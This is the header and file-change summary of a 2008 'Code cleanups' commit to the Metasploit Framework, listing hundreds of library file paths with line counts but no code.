From f124597a564de8f6b1d39f2f9cbe7c43b145b131 Mon Sep 17 00:00:00 2001 From: Ramon de C Valle Date: Sun, 19 Oct 2008 21:03:39 +0000 Subject: [PATCH] Code cleanups git-svn-id: file:///home/svn/framework3/trunk@5773 4d416f70-5f16-0410-b530-b9f4589650da --- lib/bindata.rb | 2 +- lib/bindata/array.rb | 2 +- lib/bindata/base.rb | 2 +- lib/bindata/bits.rb | 2 +- lib/bindata/choice.rb | 2 +- lib/bindata/float.rb | 2 +- lib/bindata/int.rb | 2 +- lib/bindata/io.rb | 2 +- lib/bindata/lazy.rb | 2 +- lib/bindata/multi_value.rb | 2 +- lib/bindata/my_array.rb | 2 +- lib/bindata/registry.rb | 2 +- lib/bindata/rest.rb | 2 +- lib/bindata/sanitize.rb | 3 +-- lib/bindata/single.rb | 2 +- lib/bindata/single_value.rb | 2 +- lib/bindata/string.rb | 2 +- lib/bindata/stringz.rb | 2 +- lib/bindata/struct.rb | 2 +- lib/metasm.rb | 2 +- lib/metasm/metasm-shell.rb | 2 +- lib/metasm/metasm.rb | 2 +- lib/metasm/metasm/arm/encode.rb | 2 +- lib/metasm/metasm/arm/main.rb | 3 +-- lib/metasm/metasm/arm/opcodes.rb | 2 +- lib/metasm/metasm/arm/parse.rb | 2 +- lib/metasm/metasm/compile_c.rb | 2 +- lib/metasm/metasm/decode.rb | 2 +- lib/metasm/metasm/encode.rb | 2 +- lib/metasm/metasm/exe_format/a_out.rb | 2 +- lib/metasm/metasm/exe_format/autoexe.rb | 2 +- lib/metasm/metasm/exe_format/coff.rb | 2 +- lib/metasm/metasm/exe_format/coff_decode.rb | 2 +- lib/metasm/metasm/exe_format/coff_encode.rb | 2 +- lib/metasm/metasm/exe_format/elf.rb | 3 +-- lib/metasm/metasm/exe_format/elf_decode.rb | 2 +- lib/metasm/metasm/exe_format/elf_encode.rb | 2 +- lib/metasm/metasm/exe_format/main.rb | 2 +- lib/metasm/metasm/exe_format/mz.rb | 2 +- lib/metasm/metasm/exe_format/pe.rb | 2 +- lib/metasm/metasm/exe_format/shellcode.rb | 2 +- lib/metasm/metasm/exe_format/xcoff.rb | 2 +- lib/metasm/metasm/gui/gtk.rb | 2 +- lib/metasm/metasm/gui/gtk_graph.rb | 2 +- lib/metasm/metasm/gui/gtk_listing.rb | 2 +- lib/metasm/metasm/ia32/compile_c.rb | 2 +- lib/metasm/metasm/ia32/decode.rb | 2 +- lib/metasm/metasm/ia32/encode.rb | 2 +- lib/metasm/metasm/ia32/main.rb | 2 +- lib/metasm/metasm/ia32/opcodes.rb | 2 +- lib/metasm/metasm/ia32/parse.rb | 2 +- lib/metasm/metasm/ia32/render.rb | 2 +- lib/metasm/metasm/main.rb | 2 +- lib/metasm/metasm/mips/compile_c.rb | 2 +- lib/metasm/metasm/mips/decode.rb | 2 +- lib/metasm/metasm/mips/encode.rb | 2 +- lib/metasm/metasm/mips/main.rb | 3 +-- lib/metasm/metasm/mips/opcodes.rb | 2 +- lib/metasm/metasm/mips/parse.rb | 2 +- lib/metasm/metasm/mips/render.rb | 2 +- lib/metasm/metasm/os/linux.rb | 2 +- lib/metasm/metasm/os/main.rb | 2 +- lib/metasm/metasm/os/windows.rb | 3 +-- lib/metasm/metasm/parse.rb | 2 +- lib/metasm/metasm/parse_c.rb | 2 +- lib/metasm/metasm/pic16c/decode.rb | 2 +- lib/metasm/metasm/pic16c/main.rb | 2 +- lib/metasm/metasm/pic16c/opcode.rb | 2 +- lib/metasm/metasm/preprocessor.rb | 2 +- lib/metasm/metasm/render.rb | 2 +- lib/metasm/misc/cheader-findpppath.rb | 2 +- lib/metasm/misc/hexdiff.rb | 2 +- lib/metasm/misc/hexdump.rb | 2 +- lib/metasm/misc/metasm-all.rb | 2 +- lib/metasm/misc/objdiff.rb | 2 +- lib/metasm/misc/objscan.rb | 2 +- lib/metasm/samples/a.out.rb | 2 +- lib/metasm/samples/asmsyntax.rb | 2 +- lib/metasm/samples/compilation-steps.rb | 2 +- lib/metasm/samples/cparser_makestackoffset.rb | 2 +- lib/metasm/samples/dasm-backtrack.rb | 2 +- lib/metasm/samples/dasmnavig.rb | 2 +- lib/metasm/samples/disassemble-gtk.rb | 2 +- lib/metasm/samples/disassemble.rb | 2 +- lib/metasm/samples/dump_upx.rb | 2 +- lib/metasm/samples/elf_list_needed.rb | 2 +- lib/metasm/samples/elf_listexports.rb | 2 +- lib/metasm/samples/elfencode-c.rb | 3 +-- lib/metasm/samples/elfencode.rb | 3 +-- lib/metasm/samples/factorize-headers-peimports.rb | 2 +- lib/metasm/samples/factorize-headers.rb | 3 +-- lib/metasm/samples/lindebug.rb | 2 +- lib/metasm/samples/linux_injectsyscall.rb | 2 +- lib/metasm/samples/pe-hook.rb | 2 +- lib/metasm/samples/pe-ia32-cpuid.rb | 2 +- lib/metasm/samples/pe-mips.rb | 3 +-- lib/metasm/samples/pe-shutdown.rb | 2 +- lib/metasm/samples/pe-testrelocs.rb | 2 +- lib/metasm/samples/pe-testrsrc.rb | 2 +- lib/metasm/samples/pe_listexports.rb | 2 +- lib/metasm/samples/preprocess-flatten.rb | 2 +- lib/metasm/samples/rubstop.rb | 2 +- lib/metasm/samples/scan_pt_gnu_stack.rb | 2 +- lib/metasm/samples/scanpeexports.rb | 2 +- lib/metasm/samples/shellcode-c.rb | 2 +- lib/metasm/samples/testpe.rb | 2 +- lib/metasm/samples/testraw.rb | 2 +- lib/metasm/samples/win32hooker-advanced.rb | 2 +- lib/metasm/samples/win32hooker.rb | 2 +- lib/metasm/samples/win32livedasm.rb | 2 +- lib/metasm/samples/wintrace.rb | 2 +- lib/metasm/tests/all.rb | 3 +-- lib/metasm/tests/encodeddata.rb | 2 +- lib/metasm/tests/mips.rb | 2 +- lib/metasm/tests/preprocessor.rb | 3 +-- lib/msf/base.rb | 2 +- lib/msf/base.rb.ts.rb | 2 +- lib/msf/base/config.rb | 2 +- lib/msf/base/logging.rb | 2 +- lib/msf/base/persistent_storage.rb | 2 +- lib/msf/base/persistent_storage/flatfile.rb | 2 +- lib/msf/base/serializer/readable_text.rb | 2 +- lib/msf/base/sessions/command_shell.rb | 2 +- lib/msf/base/sessions/command_shell.rb.ut.rb | 2 +- lib/msf/base/sessions/meterpreter.rb | 2 +- lib/msf/base/sessions/vncinject.rb | 2 +- lib/msf/base/simple.rb | 2 +- lib/msf/base/simple/auxiliary.rb | 2 +- lib/msf/base/simple/buffer.rb | 2 +- lib/msf/base/simple/encoder.rb | 2 +- lib/msf/base/simple/exploit.rb | 2 +- lib/msf/base/simple/framework.rb | 2 +- lib/msf/base/simple/module.rb | 2 +- lib/msf/base/simple/nop.rb | 2 +- lib/msf/base/simple/payload.rb | 2 +- lib/msf/base/simple/statistics.rb | 2 +- lib/msf/core.rb | 2 +- lib/msf/core.rb.ts.rb | 2 +- lib/msf/core/auxiliary.rb | 2 +- lib/msf/core/auxiliary/dos.rb | 2 +- lib/msf/core/auxiliary/report.rb | 2 +- lib/msf/core/auxiliary/scanner.rb | 2 +- lib/msf/core/auxiliary/timed.rb | 2 +- lib/msf/core/auxiliary/wmapmodule.rb | 2 +- lib/msf/core/constants.rb | 2 +- lib/msf/core/data_store.rb | 2 +- lib/msf/core/db.rb | 2 +- lib/msf/core/db_manager.rb | 2 +- lib/msf/core/db_objects.rb | 2 +- lib/msf/core/encoded_payload.rb | 2 +- lib/msf/core/encoder.rb | 2 +- lib/msf/core/encoder/alphanum.rb | 2 +- lib/msf/core/encoder/nonalpha.rb | 2 +- lib/msf/core/encoder/nonupper.rb | 2 +- lib/msf/core/encoder/xor.rb | 2 +- lib/msf/core/encoder/xor_additive_feedback.rb | 2 +- lib/msf/core/encoding/xor.rb | 2 +- lib/msf/core/event_dispatcher.rb | 2 +- lib/msf/core/exceptions.rb | 2 +- lib/msf/core/exceptions.rb.ut.rb | 2 +- lib/msf/core/exploit.rb | 2 +- lib/msf/core/exploit.rb.ut.rb | 2 +- lib/msf/core/exploit/arkeia.rb | 2 +- lib/msf/core/exploit/brute.rb | 2 +- lib/msf/core/exploit/brutetargets.rb | 2 +- lib/msf/core/exploit/capture.rb | 2 +- lib/msf/core/exploit/dcerpc.rb | 2 +- lib/msf/core/exploit/dcerpc.rb.ut.rb | 2 +- lib/msf/core/exploit/dcerpc_epm.rb | 2 +- lib/msf/core/exploit/dcerpc_lsa.rb | 2 +- lib/msf/core/exploit/dcerpc_mgmt.rb | 2 +- lib/msf/core/exploit/egghunter.rb | 2 +- lib/msf/core/exploit/ftp.rb | 2 +- lib/msf/core/exploit/http.rb | 2 +- lib/msf/core/exploit/imap.rb | 2 +- lib/msf/core/exploit/ip.rb | 2 +- lib/msf/core/exploit/kernel_mode.rb | 2 +- lib/msf/core/exploit/lorcon.rb | 2 +- lib/msf/core/exploit/mssql.rb | 2 +- lib/msf/core/exploit/ndmp.rb | 2 +- lib/msf/core/exploit/pop2.rb | 2 +- lib/msf/core/exploit/seh.rb | 2 +- lib/msf/core/exploit/seh.rb.ut.rb | 2 +- lib/msf/core/exploit/smb.rb | 2 +- lib/msf/core/exploit/smtp.rb | 2 +- lib/msf/core/exploit/smtp_deliver.rb | 2 +- lib/msf/core/exploit/sunrpc.rb | 2 +- lib/msf/core/exploit/tcp.rb | 2 +- lib/msf/core/exploit/tcp.rb.ut.rb | 2 +- lib/msf/core/exploit/udp.rb | 2 +- lib/msf/core/exploit_driver.rb | 2 +- lib/msf/core/framework.rb | 2 +- lib/msf/core/handler.rb | 2 +- lib/msf/core/handler/bind_tcp.rb | 2 +- lib/msf/core/handler/bind_tcp.rb.ut.rb | 2 +- lib/msf/core/handler/find_port.rb | 2 +- lib/msf/core/handler/find_shell.rb | 2 +- lib/msf/core/handler/find_tag.rb | 2 +- lib/msf/core/handler/none.rb | 2 +- lib/msf/core/handler/passivex.rb | 2 +- lib/msf/core/handler/reverse_tcp.rb | 2 +- lib/msf/core/handler/reverse_tcp.rb.ut.rb | 2 +- lib/msf/core/handler/reverse_tcp_double.rb | 2 +- lib/msf/core/module.rb | 2 +- lib/msf/core/module/author.rb | 2 +- lib/msf/core/module/author.rb.ut.rb | 2 +- lib/msf/core/module/auxiliary_action.rb | 3 +-- lib/msf/core/module/platform.rb | 2 +- lib/msf/core/module/platform_list.rb | 2 +- lib/msf/core/module/platform_list.rb.ut.rb | 2 +- lib/msf/core/module/reference.rb | 4 +--- lib/msf/core/module/reference.rb.ut.rb | 2 +- lib/msf/core/module/target.rb | 3 +-- lib/msf/core/module/target.rb.ut.rb | 2 +- lib/msf/core/module_manager.rb | 2 +- lib/msf/core/nop.rb | 2 +- lib/msf/core/option_container.rb | 2 +- lib/msf/core/option_container.rb.ut.rb | 2 +- lib/msf/core/payload.rb | 2 +- lib/msf/core/payload/bsd.rb | 2 +- lib/msf/core/payload/generic.rb | 2 +- lib/msf/core/payload/linux.rb | 2 +- lib/msf/core/payload/netware.rb | 2 +- lib/msf/core/payload/osx.rb | 2 +- lib/msf/core/payload/php.rb | 2 +- lib/msf/core/payload/single.rb | 2 +- lib/msf/core/payload/solaris.rb | 2 +- lib/msf/core/payload/stager.rb | 2 +- lib/msf/core/payload/windows.rb | 2 +- lib/msf/core/payload/windows/dllinject.rb | 2 +- lib/msf/core/payload/windows/exec.rb | 2 +- lib/msf/core/payload_set.rb | 2 +- lib/msf/core/plugin.rb | 2 +- lib/msf/core/plugin_manager.rb | 2 +- lib/msf/core/session.rb | 2 +- lib/msf/core/session/basic.rb | 2 +- lib/msf/core/session/comm.rb | 2 +- lib/msf/core/session/interactive.rb | 2 +- lib/msf/core/session/netware_console.rb | 2 +- .../session/provider/multi_command_execution.rb | 2 +- .../core/session/provider/multi_command_shell.rb | 2 +- .../session/provider/single_command_execution.rb | 2 +- .../core/session/provider/single_command_shell.rb | 2 +- lib/msf/core/session_manager.rb | 2 +- lib/msf/core/session_manager.rb.ut.rb | 2 +- lib/msf/sanity.rb | 2 +- lib/msf/ui.rb | 2 +- lib/msf/ui/banner.rb | 2 +- lib/msf/ui/common.rb | 2 +- lib/msf/ui/console.rb | 2 +- lib/msf/ui/console/command_dispatcher.rb | 3 +-- lib/msf/ui/console/command_dispatcher/auxiliary.rb | 2 +- lib/msf/ui/console/command_dispatcher/core.rb | 2 +- lib/msf/ui/console/command_dispatcher/db.rb | 2 +- lib/msf/ui/console/command_dispatcher/encoder.rb | 2 +- lib/msf/ui/console/command_dispatcher/exploit.rb | 2 +- lib/msf/ui/console/command_dispatcher/nop.rb | 2 +- lib/msf/ui/console/command_dispatcher/payload.rb | 2 +- lib/msf/ui/console/command_dispatcher/wmap.rb | 2 +- lib/msf/ui/console/driver.rb | 2 +- lib/msf/ui/console/framework_event_manager.rb | 2 +- lib/msf/ui/console/table.rb | 2 +- lib/msf/ui/driver.rb | 2 +- lib/msf/ui/gtk2.rb | 2 +- lib/msf/ui/gtk2/about.rb | 2 +- lib/msf/ui/gtk2/app.rb | 2 +- lib/msf/ui/gtk2/assistant.rb | 2 +- lib/msf/ui/gtk2/assistant/auxiliary.rb | 2 +- lib/msf/ui/gtk2/assistant/exploit.rb | 2 +- lib/msf/ui/gtk2/assistant/skeleton.rb | 2 +- lib/msf/ui/gtk2/assistant/tips.rb | 2 +- lib/msf/ui/gtk2/assistant/types.rb | 2 +- lib/msf/ui/gtk2/assistant/types/address.rb | 2 +- lib/msf/ui/gtk2/assistant/types/bool.rb | 2 +- lib/msf/ui/gtk2/assistant/types/integer.rb | 2 +- lib/msf/ui/gtk2/assistant/types/path.rb | 2 +- lib/msf/ui/gtk2/assistant/types/port.rb | 2 +- lib/msf/ui/gtk2/assistant/types/raw.rb | 2 +- lib/msf/ui/gtk2/assistant/types/skeleton.rb | 2 +- lib/msf/ui/gtk2/assistant/types/string.rb | 2 +- lib/msf/ui/gtk2/console/console.rb | 2 +- lib/msf/ui/gtk2/console/interactive_channel.rb | 2 +- lib/msf/ui/gtk2/console/skeleton.rb | 2 +- lib/msf/ui/gtk2/controls.rb | 2 +- lib/msf/ui/gtk2/dialog/confirm.rb | 2 +- lib/msf/ui/gtk2/dialog/error.rb | 2 +- lib/msf/ui/gtk2/dialog/payload.rb | 2 +- lib/msf/ui/gtk2/dialog/skeleton_alert.rb | 2 +- lib/msf/ui/gtk2/dialog/skeleton_basic.rb | 2 +- lib/msf/ui/gtk2/dialog/skeleton_browser.rb | 2 +- lib/msf/ui/gtk2/dialog/skeleton_textbuffer.rb | 2 +- lib/msf/ui/gtk2/dialog/skeleton_tree.rb | 2 +- lib/msf/ui/gtk2/dialog/warning.rb | 2 +- lib/msf/ui/gtk2/dialogs.rb | 2 +- lib/msf/ui/gtk2/driver.rb | 2 +- lib/msf/ui/gtk2/frame.rb | 2 +- lib/msf/ui/gtk2/frame/jobs_tree.rb | 2 +- lib/msf/ui/gtk2/frame/modules_tree.rb | 2 +- lib/msf/ui/gtk2/frame/modules_view.rb | 2 +- lib/msf/ui/gtk2/frame/sessions_tree.rb | 2 +- lib/msf/ui/gtk2/frame/tips.rb | 2 +- lib/msf/ui/gtk2/framework_event_manager.rb | 2 +- lib/msf/ui/gtk2/meterpreter.rb | 3 +-- lib/msf/ui/gtk2/meterpreter/stdapi/fs.rb | 2 +- lib/msf/ui/gtk2/meterpreter/stdapi/sys.rb | 2 +- lib/msf/ui/gtk2/opcode/groups.rb | 2 +- lib/msf/ui/gtk2/opcode/locales.rb | 2 +- lib/msf/ui/gtk2/opcode/metatypes.rb | 2 +- lib/msf/ui/gtk2/opcode/modules.rb | 2 +- lib/msf/ui/gtk2/opcode/platforms.rb | 2 +- lib/msf/ui/gtk2/opcode/skeleton.rb | 2 +- lib/msf/ui/gtk2/opcode/stats.rb | 2 +- lib/msf/ui/gtk2/opcode/types.rb | 2 +- lib/msf/ui/gtk2/preferences/databases.rb | 2 +- lib/msf/ui/gtk2/preferences/main.rb | 2 +- lib/msf/ui/gtk2/search.rb | 2 +- lib/msf/ui/gtk2/treeviewtooltips.rb | 2 +- lib/msf/ui/gtk2/window.rb | 2 +- lib/msf/ui/gtk2/window/auxiliary.rb | 2 +- lib/msf/ui/gtk2/window/codeview.rb | 2 +- lib/msf/ui/gtk2/window/consoles.rb | 2 +- lib/msf/ui/gtk2/window/logs.rb | 2 +- lib/msf/ui/web.rb | 2 +- lib/msf/ui/web/comm.rb | 2 +- lib/msf/ui/web/console.rb | 2 +- lib/msf/ui/web/driver.rb | 2 +- lib/msf/ui/wx.rb | 2 +- lib/net/dns.rb | 2 +- lib/net/dns/dns.rb | 2 +- lib/net/dns/header.rb | 2 +- lib/net/dns/names/names.rb | 2 +- lib/net/dns/packet.rb | 2 +- lib/net/dns/question.rb | 2 +- lib/net/dns/resolver.rb | 14 +------------- lib/net/dns/resolver/socks.rb | 3 +-- lib/net/dns/resolver/timeouts.rb | 2 +- lib/net/dns/rr.rb | 3 +-- lib/net/dns/rr/a.rb | 4 +--- lib/net/dns/rr/aaaa.rb | 4 +--- lib/net/dns/rr/classes.rb | 2 +- lib/net/dns/rr/cname.rb | 4 +--- lib/net/dns/rr/hinfo.rb | 3 +-- lib/net/dns/rr/mr.rb | 3 +-- lib/net/dns/rr/mx.rb | 5 +---- lib/net/dns/rr/ns.rb | 5 +---- lib/net/dns/rr/null.rb | 3 +-- lib/net/dns/rr/ptr.rb | 3 +-- lib/net/dns/rr/soa.rb | 3 +-- lib/net/dns/rr/srv.rb | 5 +---- lib/net/dns/rr/txt.rb | 6 +----- lib/net/dns/rr/types.rb | 2 +- lib/ole/base.rb | 3 +-- lib/ole/file_system.rb | 3 +-- lib/ole/io_helpers.rb | 3 +-- lib/ole/storage.rb | 3 +-- lib/ole/support.rb | 3 +-- lib/ole/types.rb | 3 +-- lib/packetfu.rb | 2 +- lib/packetfu/arp.rb | 3 +-- lib/packetfu/capture.rb | 3 +-- lib/packetfu/config.rb | 2 +- lib/packetfu/eth.rb | 2 +- lib/packetfu/icmp.rb | 3 +-- lib/packetfu/inject.rb | 3 +-- lib/packetfu/invalid.rb | 2 +- lib/packetfu/ip.rb | 2 +- lib/packetfu/ipv6.rb | 2 +- lib/packetfu/packet.rb | 3 +-- lib/packetfu/pcap.rb | 3 +-- lib/packetfu/read.rb | 2 +- lib/packetfu/tcp.rb | 3 +-- lib/packetfu/tcpopts.rb | 3 +-- lib/packetfu/udp.rb | 3 +-- lib/packetfu/utils.rb | 3 +-- lib/packetfu/write.rb | 3 +-- lib/rabal/tree.rb | 2 +- lib/rex.rb | 3 +-- lib/rex.rb.ts.rb | 2 +- lib/rex/arch.rb | 2 +- lib/rex/arch/sparc.rb | 2 +- lib/rex/arch/sparc.rb.ut.rb | 2 +- lib/rex/arch/x86.rb | 2 +- lib/rex/arch/x86.rb.ut.rb | 2 +- lib/rex/assembly/nasm.rb | 2 +- lib/rex/assembly/nasm.rb.ut.rb | 2 +- lib/rex/compat.rb | 3 +-- lib/rex/constants.rb | 3 +-- lib/rex/encoder/alpha2.rb | 2 +- lib/rex/encoder/alpha2/alpha_mixed.rb | 2 +- lib/rex/encoder/alpha2/alpha_upper.rb | 2 +- lib/rex/encoder/alpha2/generic.rb | 2 +- lib/rex/encoder/alpha2/unicode_mixed.rb | 2 +- lib/rex/encoder/alpha2/unicode_upper.rb | 2 +- lib/rex/encoder/ndr.rb | 2 +- lib/rex/encoder/ndr.rb.ut.rb | 2 +- lib/rex/encoder/nonalpha.rb | 2 +- lib/rex/encoder/nonupper.rb | 2 +- lib/rex/encoder/xdr.rb | 2 +- lib/rex/encoder/xdr.rb.ut.rb | 2 +- lib/rex/encoder/xor.rb | 2 +- lib/rex/encoder/xor/dword.rb | 2 +- lib/rex/encoder/xor/dword_additive.rb | 2 +- lib/rex/encoders/xor_dword.rb | 2 +- lib/rex/encoders/xor_dword.rb.ut.rb | 2 +- lib/rex/encoders/xor_dword_additive.rb | 2 +- lib/rex/encoders/xor_dword_additive.rb.ut.rb | 2 +- lib/rex/encoding/xor.rb | 2 +- lib/rex/encoding/xor.rb.ts.rb | 2 +- lib/rex/encoding/xor/byte.rb | 2 +- lib/rex/encoding/xor/byte.rb.ut.rb | 2 +- lib/rex/encoding/xor/dword.rb | 2 +- lib/rex/encoding/xor/dword.rb.ut.rb | 2 +- lib/rex/encoding/xor/dword_additive.rb | 2 +- lib/rex/encoding/xor/dword_additive.rb.ut.rb | 2 +- lib/rex/encoding/xor/exceptions.rb | 2 +- lib/rex/encoding/xor/generic.rb | 2 +- lib/rex/encoding/xor/generic.rb.ut.rb | 2 +- lib/rex/encoding/xor/word.rb | 2 +- lib/rex/encoding/xor/word.rb.ut.rb | 2 +- lib/rex/exceptions.rb | 2 +- lib/rex/exceptions.rb.ut.rb | 2 +- lib/rex/exploitation/egghunter.rb | 2 +- lib/rex/exploitation/egghunter.rb.ut.rb | 2 +- lib/rex/exploitation/heaplib.rb | 2 +- lib/rex/exploitation/javascriptosdetect.rb | 2 +- lib/rex/exploitation/obfuscatejs.rb | 2 +- lib/rex/exploitation/opcodedb.rb | 2 +- lib/rex/exploitation/opcodedb.rb.ut.rb | 2 +- lib/rex/exploitation/seh.rb | 2 +- lib/rex/exploitation/seh.rb.ut.rb | 2 +- lib/rex/file.rb | 2 +- lib/rex/file.rb.ut.rb | 2 +- lib/rex/io/bidirectional_pipe.rb | 2 +- lib/rex/io/datagram_abstraction.rb | 2 +- lib/rex/io/stream.rb | 2 +- lib/rex/io/stream_abstraction.rb | 2 +- lib/rex/io/stream_server.rb | 2 +- lib/rex/job_container.rb | 2 +- lib/rex/logging.rb | 2 +- lib/rex/logging/log_dispatcher.rb | 3 +-- lib/rex/logging/log_sink.rb | 2 +- lib/rex/logging/sinks/flatfile.rb | 2 +- lib/rex/logging/sinks/stderr.rb | 2 +- lib/rex/machparsey.rb | 2 +- lib/rex/machparsey/exceptions.rb | 3 +-- lib/rex/machparsey/mach.rb | 2 +- lib/rex/machparsey/machbase.rb | 2 +- lib/rex/machscan.rb | 2 +- lib/rex/machscan/scanner.rb | 2 +- lib/rex/mime.rb | 2 +- lib/rex/mime/header.rb | 2 +- lib/rex/mime/message.rb | 2 +- lib/rex/mime/part.rb | 2 +- lib/rex/nop/opty2.rb | 2 +- lib/rex/nop/opty2.rb.ut.rb | 2 +- lib/rex/nop/opty2_tables.rb | 2 +- lib/rex/parser/arguments.rb | 2 +- lib/rex/parser/arguments.rb.ut.rb | 2 +- lib/rex/parser/ini.rb | 2 +- lib/rex/parser/ini.rb.ut.rb | 2 +- lib/rex/payloads.rb | 2 +- lib/rex/payloads/win32.rb | 2 +- lib/rex/payloads/win32/common.rb | 2 +- lib/rex/payloads/win32/kernel.rb | 2 +- lib/rex/payloads/win32/kernel/common.rb | 2 +- lib/rex/payloads/win32/kernel/migration.rb | 2 +- lib/rex/payloads/win32/kernel/recovery.rb | 2 +- lib/rex/payloads/win32/kernel/stager.rb | 2 +- lib/rex/peparsey/exceptions.rb | 2 +- lib/rex/peparsey/pe.rb | 3 +-- lib/rex/peparsey/pe_memdump.rb | 3 +-- lib/rex/peparsey/pebase.rb | 3 +-- lib/rex/peparsey/section.rb | 2 +- lib/rex/pescan/analyze.rb | 2 +- lib/rex/pescan/scanner.rb | 2 +- lib/rex/pescan/search.rb | 2 +- lib/rex/platforms.rb | 2 +- lib/rex/platforms/windows.rb | 2 +- lib/rex/poly.rb | 2 +- lib/rex/poly/block.rb | 2 +- lib/rex/poly/register.rb | 2 +- lib/rex/poly/register/x86.rb | 2 +- lib/rex/post.rb | 2 +- lib/rex/post/dir.rb | 3 +-- lib/rex/post/file.rb | 2 +- lib/rex/post/file_stat.rb | 2 +- lib/rex/post/io.rb | 3 +-- lib/rex/post/meterpreter.rb | 2 +- lib/rex/post/meterpreter/channel.rb | 2 +- lib/rex/post/meterpreter/channel_container.rb | 2 +- lib/rex/post/meterpreter/channels/pool.rb | 2 +- lib/rex/post/meterpreter/channels/pools/file.rb | 2 +- .../post/meterpreter/channels/pools/stream_pool.rb | 2 +- lib/rex/post/meterpreter/channels/stream.rb | 2 +- lib/rex/post/meterpreter/client.rb | 2 +- lib/rex/post/meterpreter/client_core.rb | 2 +- lib/rex/post/meterpreter/dependencies.rb | 2 +- lib/rex/post/meterpreter/extension.rb | 2 +- .../meterpreter/extensions/incognito/incognito.rb | 2 +- .../post/meterpreter/extensions/incognito/tlv.rb | 2 +- lib/rex/post/meterpreter/extensions/priv/fs.rb | 2 +- lib/rex/post/meterpreter/extensions/priv/passwd.rb | 2 +- lib/rex/post/meterpreter/extensions/priv/priv.rb | 2 +- lib/rex/post/meterpreter/extensions/priv/tlv.rb | 2 +- .../meterpreter/extensions/stdapi/constants.rb | 2 +- .../post/meterpreter/extensions/stdapi/fs/dir.rb | 2 +- .../post/meterpreter/extensions/stdapi/fs/file.rb | 2 +- .../meterpreter/extensions/stdapi/fs/file_stat.rb | 2 +- .../post/meterpreter/extensions/stdapi/fs/io.rb | 2 +- .../meterpreter/extensions/stdapi/net/config.rb | 2 +- .../meterpreter/extensions/stdapi/net/interface.rb | 2 +- .../meterpreter/extensions/stdapi/net/route.rb | 2 +- .../meterpreter/extensions/stdapi/net/socket.rb | 2 +- .../net/socket_subsystem/tcp_client_channel.rb | 2 +- .../post/meterpreter/extensions/stdapi/stdapi.rb | 2 +- .../meterpreter/extensions/stdapi/sys/config.rb | 2 +- .../meterpreter/extensions/stdapi/sys/event_log.rb | 2 +- .../stdapi/sys/event_log_subsystem/event_record.rb | 2 +- .../meterpreter/extensions/stdapi/sys/power.rb | 2 +- .../meterpreter/extensions/stdapi/sys/process.rb | 2 +- .../stdapi/sys/process_subsystem/image.rb | 2 +- .../extensions/stdapi/sys/process_subsystem/io.rb | 2 +- .../stdapi/sys/process_subsystem/memory.rb | 3 +-- .../stdapi/sys/process_subsystem/thread.rb | 2 +- .../meterpreter/extensions/stdapi/sys/registry.rb | 2 +- .../stdapi/sys/registry_subsystem/registry_key.rb | 2 +- .../sys/registry_subsystem/registry_value.rb | 2 +- .../meterpreter/extensions/stdapi/sys/thread.rb | 2 +- lib/rex/post/meterpreter/extensions/stdapi/tlv.rb | 2 +- lib/rex/post/meterpreter/extensions/stdapi/ui.rb | 2 +- lib/rex/post/meterpreter/inbound_packet_handler.rb | 2 +- lib/rex/post/meterpreter/object_aliases.rb | 2 +- lib/rex/post/meterpreter/packet.rb | 2 +- lib/rex/post/meterpreter/packet_dispatcher.rb | 2 +- lib/rex/post/meterpreter/packet_parser.rb | 2 +- lib/rex/post/meterpreter/packet_response_waiter.rb | 2 +- lib/rex/post/meterpreter/ui/console.rb | 2 +- .../meterpreter/ui/console/command_dispatcher.rb | 2 +- .../ui/console/command_dispatcher/core.rb | 2 +- .../ui/console/command_dispatcher/incognito.rb | 2 +- .../ui/console/command_dispatcher/priv.rb | 2 +- .../ui/console/command_dispatcher/priv/passwd.rb | 2 +- .../console/command_dispatcher/priv/timestomp.rb | 2 +- .../ui/console/command_dispatcher/stdapi.rb | 2 +- .../ui/console/command_dispatcher/stdapi/fs.rb | 2 +- .../ui/console/command_dispatcher/stdapi/net.rb | 2 +- .../ui/console/command_dispatcher/stdapi/sys.rb | 2 +- .../ui/console/command_dispatcher/stdapi/ui.rb | 2 +- .../meterpreter/ui/console/interactive_channel.rb | 2 +- lib/rex/post/permission.rb | 2 +- lib/rex/post/process.rb | 2 +- lib/rex/post/thread.rb | 2 +- lib/rex/post/ui.rb | 2 +- lib/rex/proto.rb | 2 +- lib/rex/proto.rb.ts.rb | 2 +- lib/rex/proto/dcerpc.rb | 2 +- lib/rex/proto/dcerpc.rb.ts.rb | 2 +- lib/rex/proto/dcerpc/client.rb | 2 +- lib/rex/proto/dcerpc/client.rb.ut.rb | 2 +- lib/rex/proto/dcerpc/exceptions.rb | 2 +- lib/rex/proto/dcerpc/handle.rb | 2 +- lib/rex/proto/dcerpc/handle.rb.ut.rb | 2 +- lib/rex/proto/dcerpc/ndr.rb | 2 +- lib/rex/proto/dcerpc/ndr.rb.ut.rb | 2 +- lib/rex/proto/dcerpc/packet.rb | 2 +- lib/rex/proto/dcerpc/packet.rb.ut.rb | 2 +- lib/rex/proto/dcerpc/response.rb | 2 +- lib/rex/proto/dcerpc/response.rb.ut.rb | 2 +- lib/rex/proto/dcerpc/uuid.rb | 2 +- lib/rex/proto/dcerpc/uuid.rb.ut.rb | 2 +- lib/rex/proto/http.rb | 2 +- lib/rex/proto/http.rb.ts.rb | 2 +- lib/rex/proto/http/client.rb | 2 +- lib/rex/proto/http/client.rb.ut.rb | 2 +- lib/rex/proto/http/handler.rb | 2 +- lib/rex/proto/http/handler/erb.rb | 2 +- lib/rex/proto/http/handler/erb.rb.ut.rb | 2 +- lib/rex/proto/http/handler/proc.rb | 2 +- lib/rex/proto/http/handler/proc.rb.ut.rb | 2 +- lib/rex/proto/http/header.rb | 2 +- lib/rex/proto/http/header.rb.ut.rb | 2 +- lib/rex/proto/http/packet.rb | 2 +- lib/rex/proto/http/packet.rb.ut.rb | 2 +- lib/rex/proto/http/request.rb | 2 +- lib/rex/proto/http/request.rb.ut.rb | 2 +- lib/rex/proto/http/response.rb | 2 +- lib/rex/proto/http/response.rb.ut.rb | 2 +- lib/rex/proto/http/server.rb | 2 +- lib/rex/proto/http/server.rb.ut.rb | 2 +- lib/rex/proto/smb.rb | 2 +- lib/rex/proto/smb.rb.ts.rb | 2 +- lib/rex/proto/smb/client.rb | 2 +- lib/rex/proto/smb/client.rb.ut.rb | 2 +- lib/rex/proto/smb/constants.rb | 2 +- lib/rex/proto/smb/constants.rb.ut.rb | 2 +- lib/rex/proto/smb/crypt.rb | 2 +- lib/rex/proto/smb/crypt.rb.ut.rb | 2 +- lib/rex/proto/smb/evasions.rb | 4 +--- lib/rex/proto/smb/exceptions.rb | 4 +--- 